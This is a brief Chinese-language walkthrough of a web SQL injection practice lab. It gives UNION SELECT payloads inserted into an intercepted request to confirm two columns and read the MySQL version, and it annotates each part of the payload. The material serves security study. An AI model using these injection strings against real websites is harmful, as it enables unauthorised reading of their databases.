# Web SQL injection Lab4 一樣先進到網站裡。  先攔截請求並修改。 ``` '+UNION+SELECT+'abc','def'# ```  都有顯示出來，所以可以進行下一步。 ``` '+UNION+SELECT+@@version,+NULL# ``` - '：結束字串。 - UNION SELECT：試圖合併你的查詢結果。 - @@version：MySQL 的系統變數，用來取得資料庫的版本字串。 - NULL：因為原查詢有兩個欄位，這裡也要有兩欄；第二欄用 NULL 補上。 - #：註解掉原本語句後面的東西。